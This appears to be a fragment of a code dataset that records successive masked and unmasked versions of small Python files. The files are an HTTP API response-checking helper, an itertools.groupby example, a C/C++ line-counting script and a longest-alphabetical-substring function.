We get different value here!!'\n <mask token>\n\n def _check_partial_rsp(self, exp, ori):\n \"\"\"\n Check partial rsp but not the while rsp.\n :param exp: expected rsp\n :param ori: origin rsp\n :return: None\n \"\"\"\n logging.warning(\n 'Start to check if expected_rsp: {} is part of origin_rsp: {}'.\n format(exp, ori))\n if isinstance(exp, dict):\n for k, v in exp.iteritems():\n if ori.get(k):\n self._check_partial_rsp(exp[k], ori[k])\n else:\n assert 0, \"key '{}' does not exist in original response.\".format(\n k)\n elif isinstance(exp, list):\n for index in xrange(len(exp)):\n if isinstance(exp[index], dict):\n self._assert_dict_contain(exp[index], ori[index])\n elif isinstance(exp[index], list):\n self._check_partial_rsp(exp[index], ori[index])\n else:\n assert exp[index\n ] in ori, 'exp: {} does not in ori: {}'.format(exp[\n index], ori)\n else:\n assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,\n ori)\n\n @staticmethod\n def _assert_dict_contain(subset_dict, whole_dict):\n logging.warning('subset_dict is {}, whole_dict is {}'.format(\n subset_dict, whole_dict))\n for key in subset_dict:\n if whole_dict.get(key):\n continue\n else:\n assert 0, '{} should be subset of {}, but now it is not!!'.format(\n subset_dict, whole_dict)\n",
"step-3": "<mask token>\n\n\nclass Handler(object):\n\n def __init__(self):\n \"\"\"\n This class is used to handle interaction towards coffee interface.\n \"\"\"\n super(Handler, self).__init__()\n logging.warning('Initializing coffeeHandler....')\n self.coffee_session = requests.session()\n\n def get_rsp_from_url(self, url, params=None, method='get', data=None):\n logging.warning(\n 'when using method {}, header is:\\n {} \\n data is: \\n{}.\\n'.\n format(method, self.coffee_session.headers, data))\n rsp = None\n if 'get' == method:\n rsp = self.coffee_session.get(url, params=params, timeout=10)\n elif 'put' == method:\n rsp = self.coffee_session.put(url, data=json.dumps(data))\n elif 'post' == method:\n rsp = self.coffee_session.post(url, data=json.dumps(data))\n elif 'delete' == method:\n rsp = self.coffee_session.delete(url, data=json.dumps(data))\n else:\n assert 0, 'We only support get/post/put/delete for now!!!'\n logging.warning(\n \"\"\"\n\n#####\nget rsp from url: \n{} is :\n##### \n{}\n#####\n\ntext is: \n{}\n#####\n\"\"\"\n .format(url, repr(rsp), repr(rsp.text)))\n return rsp\n\n def check_rsp(self, origin_rsp, expected_rsp, check_format=False,\n check_partial_rsp=False, check_length=False,\n check_format_ignore_list_length=False, check_format_null_str=False):\n if check_format:\n logging.warning(\n 'Now start to check format for origin_rsp and expected_rsp!')\n self._check_format(origin_rsp, expected_rsp,\n check_format_ignore_list_length, check_format_null_str)\n if check_partial_rsp:\n self._check_partial_rsp(expected_rsp, origin_rsp)\n if check_length is not False:\n for key, expected_length in check_length.iteritems():\n current_length = len(origin_rsp[key])\n assert expected_length == current_length, \"We expect to see length of '{}' in origin_rsp is {}, but now it is {}\".format(\n key, expected_length, current_length)\n if not any([check_format, check_partial_rsp, check_length]):\n sorted_expected_rsp = self._order_json(expected_rsp)\n sorted_origin_rsp = self._order_json(origin_rsp)\n logging.warning('\\nWe expect to see \\n\\n{}, \\n\\nand we get \\n\\n{}.'\n .format(sorted_expected_rsp, sorted_origin_rsp))\n assert sorted_expected_rsp == sorted_origin_rsp, \"We don't get the expected,please check the log\"\n logging.warning('\\x1b[0;32m check_rsp done!!! PASS\\x1b[0m')\n\n def _check_format(self, origin_rsp, expected_rsp,\n check_format_ignore_list_length, check_format_null_str):\n logging.warning(u'now compare origin rsp: \\n{}'.format(origin_rsp))\n logging.warning(u'\\nAnd expected_rsp: \\n{}'.format(expected_rsp))\n if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):\n assert len(origin_rsp) == len(expected_rsp\n ), \"\"\"Length of dict is not right! Please check the length.\norigin_rsp: \n{}\nexpected_rsp: \n{}\"\"\".format(\n origin_rsp, expected_rsp)\n for key, value in origin_rsp.iteritems():\n assert expected_rsp.get(key\n ), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(\n str(key))\n logging.warning(\n u'Check value for the same key: [{}] in origin_rsp and expected_rsp'\n .format(key))\n self._check_format(value, expected_rsp.get(key),\n check_format_ignore_list_length, check_format_null_str)\n elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):\n if expected_rsp:\n logging.warning(\n \"\"\"Length of list is not right! 
Please check the length.\norigin_rsp: \n{}\nexpected_rsp: \n{}\"\"\"\n .format(origin_rsp, expected_rsp))\n if check_format_ignore_list_length:\n for index in xrange(len(expected_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[\n index], check_format_ignore_list_length,\n check_format_null_str)\n else:\n assert len(origin_rsp) == len(expected_rsp\n ), 'Length of list is not right! Please check the length.'\n for index in xrange(len(origin_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[\n index], check_format_ignore_list_length,\n check_format_null_str)\n else:\n return True\n elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):\n return True\n elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):\n return True\n elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)\n ) and (isinstance(expected_rsp, str) or isinstance(expected_rsp,\n unicode)):\n return True\n elif check_format_null_str:\n if origin_rsp is None and isinstance(expected_rsp, str):\n return True\n if origin_rsp is None and isinstance(expected_rsp, int):\n return True\n else:\n logging.warning(\n \"\"\"Check format fail!!!! We get different value here!!\norigin_rsp: \n{}\nbut we expect to see in expected_rsp: \n{}\"\"\"\n .format(origin_rsp, expected_rsp))\n assert 0, 'Check format fail!!!! We get different value here!!'\n\n def _order_json(self, json_string):\n \"\"\"\n Return an ordered list for compare.\n :param json_string: string in json format\n :return: an ordered list\n \"\"\"\n if isinstance(json_string, dict):\n return sorted((k, self._order_json(v)) for k, v in json_string.\n items())\n if isinstance(json_string, list):\n return sorted(self._order_json(x) for x in json_string)\n else:\n return json_string\n\n def _check_partial_rsp(self, exp, ori):\n \"\"\"\n Check partial rsp but not the while rsp.\n :param exp: expected rsp\n :param ori: origin rsp\n :return: None\n \"\"\"\n logging.warning(\n 'Start to check if expected_rsp: {} is part of origin_rsp: {}'.\n format(exp, ori))\n if isinstance(exp, dict):\n for k, v in exp.iteritems():\n if ori.get(k):\n self._check_partial_rsp(exp[k], ori[k])\n else:\n assert 0, \"key '{}' does not exist in original response.\".format(\n k)\n elif isinstance(exp, list):\n for index in xrange(len(exp)):\n if isinstance(exp[index], dict):\n self._assert_dict_contain(exp[index], ori[index])\n elif isinstance(exp[index], list):\n self._check_partial_rsp(exp[index], ori[index])\n else:\n assert exp[index\n ] in ori, 'exp: {} does not in ori: {}'.format(exp[\n index], ori)\n else:\n assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,\n ori)\n\n @staticmethod\n def _assert_dict_contain(subset_dict, whole_dict):\n logging.warning('subset_dict is {}, whole_dict is {}'.format(\n subset_dict, whole_dict))\n for key in subset_dict:\n if whole_dict.get(key):\n continue\n else:\n assert 0, '{} should be subset of {}, but now it is not!!'.format(\n subset_dict, whole_dict)\n",
"step-4": "import requests\nimport logging\nimport json\n\n\nclass Handler(object):\n\n def __init__(self):\n \"\"\"\n This class is used to handle interaction towards coffee interface.\n \"\"\"\n super(Handler, self).__init__()\n logging.warning('Initializing coffeeHandler....')\n self.coffee_session = requests.session()\n\n def get_rsp_from_url(self, url, params=None, method='get', data=None):\n logging.warning(\n 'when using method {}, header is:\\n {} \\n data is: \\n{}.\\n'.\n format(method, self.coffee_session.headers, data))\n rsp = None\n if 'get' == method:\n rsp = self.coffee_session.get(url, params=params, timeout=10)\n elif 'put' == method:\n rsp = self.coffee_session.put(url, data=json.dumps(data))\n elif 'post' == method:\n rsp = self.coffee_session.post(url, data=json.dumps(data))\n elif 'delete' == method:\n rsp = self.coffee_session.delete(url, data=json.dumps(data))\n else:\n assert 0, 'We only support get/post/put/delete for now!!!'\n logging.warning(\n \"\"\"\n\n#####\nget rsp from url: \n{} is :\n##### \n{}\n#####\n\ntext is: \n{}\n#####\n\"\"\"\n .format(url, repr(rsp), repr(rsp.text)))\n return rsp\n\n def check_rsp(self, origin_rsp, expected_rsp, check_format=False,\n check_partial_rsp=False, check_length=False,\n check_format_ignore_list_length=False, check_format_null_str=False):\n if check_format:\n logging.warning(\n 'Now start to check format for origin_rsp and expected_rsp!')\n self._check_format(origin_rsp, expected_rsp,\n check_format_ignore_list_length, check_format_null_str)\n if check_partial_rsp:\n self._check_partial_rsp(expected_rsp, origin_rsp)\n if check_length is not False:\n for key, expected_length in check_length.iteritems():\n current_length = len(origin_rsp[key])\n assert expected_length == current_length, \"We expect to see length of '{}' in origin_rsp is {}, but now it is {}\".format(\n key, expected_length, current_length)\n if not any([check_format, check_partial_rsp, check_length]):\n sorted_expected_rsp = self._order_json(expected_rsp)\n sorted_origin_rsp = self._order_json(origin_rsp)\n logging.warning('\\nWe expect to see \\n\\n{}, \\n\\nand we get \\n\\n{}.'\n .format(sorted_expected_rsp, sorted_origin_rsp))\n assert sorted_expected_rsp == sorted_origin_rsp, \"We don't get the expected,please check the log\"\n logging.warning('\\x1b[0;32m check_rsp done!!! PASS\\x1b[0m')\n\n def _check_format(self, origin_rsp, expected_rsp,\n check_format_ignore_list_length, check_format_null_str):\n logging.warning(u'now compare origin rsp: \\n{}'.format(origin_rsp))\n logging.warning(u'\\nAnd expected_rsp: \\n{}'.format(expected_rsp))\n if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):\n assert len(origin_rsp) == len(expected_rsp\n ), \"\"\"Length of dict is not right! Please check the length.\norigin_rsp: \n{}\nexpected_rsp: \n{}\"\"\".format(\n origin_rsp, expected_rsp)\n for key, value in origin_rsp.iteritems():\n assert expected_rsp.get(key\n ), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(\n str(key))\n logging.warning(\n u'Check value for the same key: [{}] in origin_rsp and expected_rsp'\n .format(key))\n self._check_format(value, expected_rsp.get(key),\n check_format_ignore_list_length, check_format_null_str)\n elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):\n if expected_rsp:\n logging.warning(\n \"\"\"Length of list is not right! 
Please check the length.\norigin_rsp: \n{}\nexpected_rsp: \n{}\"\"\"\n .format(origin_rsp, expected_rsp))\n if check_format_ignore_list_length:\n for index in xrange(len(expected_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[\n index], check_format_ignore_list_length,\n check_format_null_str)\n else:\n assert len(origin_rsp) == len(expected_rsp\n ), 'Length of list is not right! Please check the length.'\n for index in xrange(len(origin_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[\n index], check_format_ignore_list_length,\n check_format_null_str)\n else:\n return True\n elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):\n return True\n elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):\n return True\n elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)\n ) and (isinstance(expected_rsp, str) or isinstance(expected_rsp,\n unicode)):\n return True\n elif check_format_null_str:\n if origin_rsp is None and isinstance(expected_rsp, str):\n return True\n if origin_rsp is None and isinstance(expected_rsp, int):\n return True\n else:\n logging.warning(\n \"\"\"Check format fail!!!! We get different value here!!\norigin_rsp: \n{}\nbut we expect to see in expected_rsp: \n{}\"\"\"\n .format(origin_rsp, expected_rsp))\n assert 0, 'Check format fail!!!! We get different value here!!'\n\n def _order_json(self, json_string):\n \"\"\"\n Return an ordered list for compare.\n :param json_string: string in json format\n :return: an ordered list\n \"\"\"\n if isinstance(json_string, dict):\n return sorted((k, self._order_json(v)) for k, v in json_string.\n items())\n if isinstance(json_string, list):\n return sorted(self._order_json(x) for x in json_string)\n else:\n return json_string\n\n def _check_partial_rsp(self, exp, ori):\n \"\"\"\n Check partial rsp but not the while rsp.\n :param exp: expected rsp\n :param ori: origin rsp\n :return: None\n \"\"\"\n logging.warning(\n 'Start to check if expected_rsp: {} is part of origin_rsp: {}'.\n format(exp, ori))\n if isinstance(exp, dict):\n for k, v in exp.iteritems():\n if ori.get(k):\n self._check_partial_rsp(exp[k], ori[k])\n else:\n assert 0, \"key '{}' does not exist in original response.\".format(\n k)\n elif isinstance(exp, list):\n for index in xrange(len(exp)):\n if isinstance(exp[index], dict):\n self._assert_dict_contain(exp[index], ori[index])\n elif isinstance(exp[index], list):\n self._check_partial_rsp(exp[index], ori[index])\n else:\n assert exp[index\n ] in ori, 'exp: {} does not in ori: {}'.format(exp[\n index], ori)\n else:\n assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,\n ori)\n\n @staticmethod\n def _assert_dict_contain(subset_dict, whole_dict):\n logging.warning('subset_dict is {}, whole_dict is {}'.format(\n subset_dict, whole_dict))\n for key in subset_dict:\n if whole_dict.get(key):\n continue\n else:\n assert 0, '{} should be subset of {}, but now it is not!!'.format(\n subset_dict, whole_dict)\n",
"step-5": "import requests\nimport logging\nimport json\n\n\nclass Handler(object):\n def __init__(self):\n \"\"\"\n This class is used to handle interaction towards coffee interface.\n \"\"\"\n super(Handler, self).__init__()\n logging.warning('Initializing coffeeHandler....')\n\n # get an active token and get prepared for sending request\n self.coffee_session = requests.session()\n\n def get_rsp_from_url(self, url, params=None, method='get', data=None):\n logging.warning('when using method {}, header is:\\n {} \\n data is: \\n{}.\\n'.\n format(method, self.coffee_session.headers, data))\n rsp = None\n\n if 'get' == method:\n rsp = self.coffee_session.get(url, params=params, timeout=10)\n elif 'put' == method:\n rsp = self.coffee_session.put(url, data=json.dumps(data))\n elif 'post' == method:\n rsp = self.coffee_session.post(url, data=json.dumps(data))\n elif 'delete' == method:\n rsp = self.coffee_session.delete(url, data=json.dumps(data))\n else:\n assert 0, 'We only support get/post/put/delete for now!!!'\n\n logging.warning('\\n\\n#####\\nget rsp from url: \\n{} is :\\n##### \\n{}\\n#####\\n\\ntext is: \\n{}\\n#####\\n'.\n format(url, repr(rsp), repr(rsp.text)))\n return rsp\n\n def check_rsp(self, origin_rsp, expected_rsp, check_format=False, check_partial_rsp=False, check_length=False,\n check_format_ignore_list_length=False, check_format_null_str=False):\n\n if check_format:\n logging.warning('Now start to check format for origin_rsp and expected_rsp!')\n\n self._check_format(origin_rsp, expected_rsp, check_format_ignore_list_length, check_format_null_str)\n if check_partial_rsp:\n self._check_partial_rsp(expected_rsp, origin_rsp)\n if check_length is not False:\n for key, expected_length in check_length.iteritems():\n current_length = len(origin_rsp[key])\n assert expected_length == current_length, \\\n 'We expect to see length of \\'{}\\' in origin_rsp is {}, but now it is {}'.format(\n key, expected_length, current_length)\n if not any([check_format, check_partial_rsp, check_length]):\n sorted_expected_rsp = self._order_json(expected_rsp)\n sorted_origin_rsp = self._order_json(origin_rsp)\n logging.warning('\\nWe expect to see \\n\\n{}, \\n\\nand we get \\n\\n{}.'.format(sorted_expected_rsp,\n sorted_origin_rsp))\n assert sorted_expected_rsp == sorted_origin_rsp, \\\n 'We don\\'t get the expected,please check the log'\n\n logging.warning('\\033[0;32m check_rsp done!!! PASS\\033[0m')\n\n def _check_format(self, origin_rsp, expected_rsp, check_format_ignore_list_length, check_format_null_str):\n\n logging.warning(u'now compare origin rsp: \\n{}'.format(origin_rsp))\n logging.warning(u'\\nAnd expected_rsp: \\n{}'.format(expected_rsp))\n\n if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):\n assert len(origin_rsp) == len(\n expected_rsp), 'Length of dict is not right! Please check the length.\\norigin_rsp: ' \\\n '\\n{}\\nexpected_rsp: \\n{}'.format(origin_rsp, expected_rsp)\n for key, value in origin_rsp.iteritems():\n assert expected_rsp.get(\n key), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(str(key))\n logging.warning(u'Check value for the same key: [{}] in origin_rsp and expected_rsp'.format(key))\n self._check_format(value, expected_rsp.get(key),\n check_format_ignore_list_length, check_format_null_str)\n elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):\n if expected_rsp:\n logging.warning('Length of list is not right! 
Please check the length.\\norigin_rsp: \\n{}\\nexpected_rsp:'\n ' \\n{}'.format(origin_rsp, expected_rsp))\n if check_format_ignore_list_length:\n for index in xrange(len(expected_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[index],\n check_format_ignore_list_length, check_format_null_str)\n else:\n assert len(origin_rsp) == len(\n expected_rsp), 'Length of list is not right! Please check the length.'\n\n for index in xrange(len(origin_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[index],\n check_format_ignore_list_length, check_format_null_str)\n else:\n return True\n elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):\n return True\n elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):\n return True\n elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)) and (\n isinstance(expected_rsp, str) or isinstance(expected_rsp, unicode)):\n return True\n elif check_format_null_str:\n if origin_rsp is None and isinstance(expected_rsp, str):\n return True\n if origin_rsp is None and isinstance(expected_rsp, int):\n return True\n else:\n logging.warning(\n 'Check format fail!!!! We get different value here!!\\norigin_rsp: \\n{}\\nbut we expect to see in '\n 'expected_rsp: \\n{}'.format(origin_rsp, expected_rsp))\n assert 0, 'Check format fail!!!! We get different value here!!'\n\n def _order_json(self, json_string):\n \"\"\"\n Return an ordered list for compare.\n :param json_string: string in json format\n :return: an ordered list\n \"\"\"\n\n if isinstance(json_string, dict):\n return sorted((k, self._order_json(v)) for k, v in json_string.items())\n if isinstance(json_string, list):\n return sorted(self._order_json(x) for x in json_string)\n else:\n return json_string\n\n def _check_partial_rsp(self, exp, ori):\n \"\"\"\n Check partial rsp but not the while rsp.\n :param exp: expected rsp\n :param ori: origin rsp\n :return: None\n \"\"\"\n logging.warning('Start to check if expected_rsp: {} is part of origin_rsp: {}'.format(exp, ori))\n # so far, leaf node could be string or list which must be exactly the same\n\n if isinstance(exp, dict):\n for k, v in exp.iteritems():\n if ori.get(k):\n self._check_partial_rsp(exp[k], ori[k])\n else:\n assert 0, 'key \\'{}\\' does not exist in original response.'.format(k)\n elif isinstance(exp, list):\n for index in xrange(len(exp)):\n if isinstance(exp[index], dict):\n self._assert_dict_contain(exp[index], ori[index])\n elif isinstance(exp[index], list):\n self._check_partial_rsp(exp[index], ori[index])\n else:\n assert exp[index] in ori, 'exp: {} does not in ori: {}'.format(exp[index], ori)\n else:\n assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp, ori)\n\n @staticmethod\n def _assert_dict_contain(subset_dict, whole_dict):\n logging.warning('subset_dict is {}, whole_dict is {}'.format(subset_dict, whole_dict))\n for key in subset_dict:\n if whole_dict.get(key):\n continue\n else:\n assert 0, '{} should be subset of {}, but now it is not!!'.format(subset_dict, whole_dict)\n",
"step-ids": [
4,
6,
8,
9,
10
]
}
|
[
4,
6,
8,
9,
10
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# groupby()
# groupby() picks out adjacent repeated elements in an iterator and groups them together:
import itertools
for key, group in itertools.groupby('ABAABBBCCAAA'):
print(key, list(group))
# Summary
# Everything the itertools module provides is a function that works on iterators; the return values are not lists but Iterators, and the values are only actually computed when you iterate over them with a for loop.
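# A quick check of the lazy behaviour noted above: groupby() returns an iterator
# object, so no grouping work happens until the object is actually consumed.
lazy = itertools.groupby('AABB')
print(lazy)                                  # e.g. <itertools.groupby object at 0x...>
print([(k, ''.join(g)) for k, g in lazy])    # values are computed here, during iteration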
|
normal
|
{
"blob_id": "b5568e84e19719f0fd72197ead47bd050e09f55d",
"index": 7310,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor key, group in itertools.groupby('ABAABBBCCAAA'):\n print(key, list(group))\n",
"step-3": "import itertools\nfor key, group in itertools.groupby('ABAABBBCCAAA'):\n print(key, list(group))\n",
"step-4": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n# groupby()\n# groupby()把迭代器中相邻的重复元素挑出来放在一起:\nimport itertools\nfor key, group in itertools.groupby('ABAABBBCCAAA'):\n print(key, list(group))\n\n\n# 小结\n# itertools模块提供的全部是处理迭代功能的函数,它们的返回值不是list,而是Iterator,只有用for循环迭代的时候才真正计算。\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('files_with_extensions.txt', 'w', encoding='utf-8') as filewrite:
for r, d, f in os.walk(startPath):
for file in f:
if file.endswith(extension0) or file.endswith(extension1
) or file.endswith(extension2) or file.endswith(extension3):
if _platform == 'linux' or _platform == 'linux2':
ss = '/'
elif _platform == 'win32' or _platform == 'win64':
ss = '\\'
filePathAndName = r + ss + file
files += 1
filewrite.write(f'{filePathAndName}')
fi = open(filePathAndName, 'r')
pos = fi.tell()
fileLines = 0
while True:
li = fi.readline()
if li.isspace():
continue
newpos = fi.tell()
fileLines += 1
if newpos == pos:
break
else:
pos = newpos
lines += fileLines
filewrite.write(f'{fileLines}\n')
print(file + ' ' + str(fileLines))
fi.close()
print(files)
print(lines)
filewrite.write(f'{files}\n')
filewrite.write(f'{lines}\n')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
files = 0
lines = 0
extension0 = '.c'
extension1 = '.cpp'
extension2 = '.h'
extension3 = '.hpp'
filename = inspect.getframeinfo(inspect.currentframe()).filename
startPath = os.path.dirname(os.path.abspath(filename))
with open('files_with_extensions.txt', 'w', encoding='utf-8') as filewrite:
for r, d, f in os.walk(startPath):
for file in f:
if file.endswith(extension0) or file.endswith(extension1
) or file.endswith(extension2) or file.endswith(extension3):
if _platform == 'linux' or _platform == 'linux2':
ss = '/'
elif _platform == 'win32' or _platform == 'win64':
ss = '\\'
filePathAndName = r + ss + file
files += 1
filewrite.write(f'{filePathAndName}')
fi = open(filePathAndName, 'r')
pos = fi.tell()
fileLines = 0
while True:
li = fi.readline()
if li.isspace():
continue
newpos = fi.tell()
fileLines += 1
if newpos == pos:
break
else:
pos = newpos
lines += fileLines
filewrite.write(f'{fileLines}\n')
print(file + ' ' + str(fileLines))
fi.close()
print(files)
print(lines)
filewrite.write(f'{files}\n')
filewrite.write(f'{lines}\n')
<|reserved_special_token_1|>
import os
from sys import platform as _platform
import fnmatch
import inspect
files = 0
lines = 0
extension0 = '.c'
extension1 = '.cpp'
extension2 = '.h'
extension3 = '.hpp'
filename = inspect.getframeinfo(inspect.currentframe()).filename
startPath = os.path.dirname(os.path.abspath(filename))
with open('files_with_extensions.txt', 'w', encoding='utf-8') as filewrite:
for r, d, f in os.walk(startPath):
for file in f:
if file.endswith(extension0) or file.endswith(extension1
) or file.endswith(extension2) or file.endswith(extension3):
if _platform == 'linux' or _platform == 'linux2':
ss = '/'
elif _platform == 'win32' or _platform == 'win64':
ss = '\\'
filePathAndName = r + ss + file
files += 1
filewrite.write(f'{filePathAndName}')
fi = open(filePathAndName, 'r')
pos = fi.tell()
fileLines = 0
while True:
li = fi.readline()
if li.isspace():
continue
newpos = fi.tell()
fileLines += 1
if newpos == pos:
break
else:
pos = newpos
lines += fileLines
filewrite.write(f'{fileLines}\n')
print(file + ' ' + str(fileLines))
fi.close()
print(files)
print(lines)
filewrite.write(f'{files}\n')
filewrite.write(f'{lines}\n')
<|reserved_special_token_1|>
#os for file system
import os
from sys import platform as _platform
import fnmatch
import inspect
files = 0
lines = 0
extension0 = '.c'
extension1 = '.cpp'
extension2 = '.h'
extension3 = '.hpp'
filename = inspect.getframeinfo(inspect.currentframe()).filename
startPath = os.path.dirname(os.path.abspath(filename))
with open("files_with_extensions.txt", "w", encoding="utf-8") as filewrite:
for r, d, f in os.walk(startPath):
for file in f:
if file.endswith(extension0) or file.endswith(extension1) or file.endswith(extension2) or file.endswith(extension3):
if _platform == "linux" or _platform == "linux2":
ss = '/'
elif _platform == "win32" or _platform == "win64":
ss = '\\'
filePathAndName = r + ss + file
files += 1
filewrite.write(f"{filePathAndName}")
fi = open(filePathAndName, 'r')
pos = fi.tell()
fileLines = 0
while (True):
li = fi.readline()
# check for any hidden symbols
if li.isspace():
continue
newpos = fi.tell()
fileLines += 1
if newpos == pos: # stream position hasn't changed -> EOF
break
else:
pos = newpos
lines += fileLines
filewrite.write(f"{fileLines}\n")
print(file + " " + str(fileLines))
fi.close()
print(files)
print(lines)
filewrite.write(f"{files}\n")
filewrite.write(f"{lines}\n")
|
flexible
|
{
"blob_id": "d287123acdbabdd5a223e774c89945ab888fcbcc",
"index": 5439,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('files_with_extensions.txt', 'w', encoding='utf-8') as filewrite:\n for r, d, f in os.walk(startPath):\n for file in f:\n if file.endswith(extension0) or file.endswith(extension1\n ) or file.endswith(extension2) or file.endswith(extension3):\n if _platform == 'linux' or _platform == 'linux2':\n ss = '/'\n elif _platform == 'win32' or _platform == 'win64':\n ss = '\\\\'\n filePathAndName = r + ss + file\n files += 1\n filewrite.write(f'{filePathAndName}')\n fi = open(filePathAndName, 'r')\n pos = fi.tell()\n fileLines = 0\n while True:\n li = fi.readline()\n if li.isspace():\n continue\n newpos = fi.tell()\n fileLines += 1\n if newpos == pos:\n break\n else:\n pos = newpos\n lines += fileLines\n filewrite.write(f'{fileLines}\\n')\n print(file + ' ' + str(fileLines))\n fi.close()\n print(files)\n print(lines)\n filewrite.write(f'{files}\\n')\n filewrite.write(f'{lines}\\n')\n",
"step-3": "<mask token>\nfiles = 0\nlines = 0\nextension0 = '.c'\nextension1 = '.cpp'\nextension2 = '.h'\nextension3 = '.hpp'\nfilename = inspect.getframeinfo(inspect.currentframe()).filename\nstartPath = os.path.dirname(os.path.abspath(filename))\nwith open('files_with_extensions.txt', 'w', encoding='utf-8') as filewrite:\n for r, d, f in os.walk(startPath):\n for file in f:\n if file.endswith(extension0) or file.endswith(extension1\n ) or file.endswith(extension2) or file.endswith(extension3):\n if _platform == 'linux' or _platform == 'linux2':\n ss = '/'\n elif _platform == 'win32' or _platform == 'win64':\n ss = '\\\\'\n filePathAndName = r + ss + file\n files += 1\n filewrite.write(f'{filePathAndName}')\n fi = open(filePathAndName, 'r')\n pos = fi.tell()\n fileLines = 0\n while True:\n li = fi.readline()\n if li.isspace():\n continue\n newpos = fi.tell()\n fileLines += 1\n if newpos == pos:\n break\n else:\n pos = newpos\n lines += fileLines\n filewrite.write(f'{fileLines}\\n')\n print(file + ' ' + str(fileLines))\n fi.close()\n print(files)\n print(lines)\n filewrite.write(f'{files}\\n')\n filewrite.write(f'{lines}\\n')\n",
"step-4": "import os\nfrom sys import platform as _platform\nimport fnmatch\nimport inspect\nfiles = 0\nlines = 0\nextension0 = '.c'\nextension1 = '.cpp'\nextension2 = '.h'\nextension3 = '.hpp'\nfilename = inspect.getframeinfo(inspect.currentframe()).filename\nstartPath = os.path.dirname(os.path.abspath(filename))\nwith open('files_with_extensions.txt', 'w', encoding='utf-8') as filewrite:\n for r, d, f in os.walk(startPath):\n for file in f:\n if file.endswith(extension0) or file.endswith(extension1\n ) or file.endswith(extension2) or file.endswith(extension3):\n if _platform == 'linux' or _platform == 'linux2':\n ss = '/'\n elif _platform == 'win32' or _platform == 'win64':\n ss = '\\\\'\n filePathAndName = r + ss + file\n files += 1\n filewrite.write(f'{filePathAndName}')\n fi = open(filePathAndName, 'r')\n pos = fi.tell()\n fileLines = 0\n while True:\n li = fi.readline()\n if li.isspace():\n continue\n newpos = fi.tell()\n fileLines += 1\n if newpos == pos:\n break\n else:\n pos = newpos\n lines += fileLines\n filewrite.write(f'{fileLines}\\n')\n print(file + ' ' + str(fileLines))\n fi.close()\n print(files)\n print(lines)\n filewrite.write(f'{files}\\n')\n filewrite.write(f'{lines}\\n')\n",
"step-5": "#os for file system\nimport os\n\nfrom sys import platform as _platform\n\nimport fnmatch\nimport inspect\n\nfiles = 0\nlines = 0 \n \nextension0 = '.c'\nextension1 = '.cpp'\nextension2 = '.h'\t\nextension3 = '.hpp'\t\n\nfilename = inspect.getframeinfo(inspect.currentframe()).filename\nstartPath = os.path.dirname(os.path.abspath(filename))\n\nwith open(\"files_with_extensions.txt\", \"w\", encoding=\"utf-8\") as filewrite:\n for r, d, f in os.walk(startPath):\n for file in f:\n if file.endswith(extension0) or file.endswith(extension1) or file.endswith(extension2) or file.endswith(extension3):\n\n if _platform == \"linux\" or _platform == \"linux2\":\n ss = '/'\n elif _platform == \"win32\" or _platform == \"win64\":\n ss = '\\\\'\n\n filePathAndName = r + ss + file\n\n files += 1\n\n filewrite.write(f\"{filePathAndName}\")\n \n fi = open(filePathAndName, 'r')\n pos = fi.tell()\n\n fileLines = 0\n while (True):\n li = fi.readline()\n\n # check for any hidden symbols\n if li.isspace():\n continue\n \n newpos = fi.tell()\n fileLines += 1\n if newpos == pos: # stream position hasn't changed -> EOF\n break\n else:\n pos = newpos\n\n lines += fileLines\n\n filewrite.write(f\"{fileLines}\\n\")\n print(file + \" \" + str(fileLines))\n\n fi.close()\n \n\n print(files)\n print(lines)\n\n filewrite.write(f\"{files}\\n\")\n filewrite.write(f\"{lines}\\n\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def long_alpha(str1):
list1 = []
list2 = ""
maxi = 0
j = 0
for i in range(len(str1)):
if i == 0:
list2 += str1[i]
elif ord(str1[i - 1]) <= ord(str1[i]):
list2 += str1[i]
else:
list1.append(list2)
list2 = ""
list2 += str1[i]
list1.append(list2)
for i in range(len(list1)):
if maxi < len(list1[i]):
maxi = len(list1[i])
j = i
return list1[j]
str1 = "abcaklmoeeffd"
res = long_alpha(str1)
print(res)
|
normal
|
{
"blob_id": "e7c18fa99c801fd959c868954f020d8c55babe0d",
"index": 7543,
"step-1": "<mask token>\n",
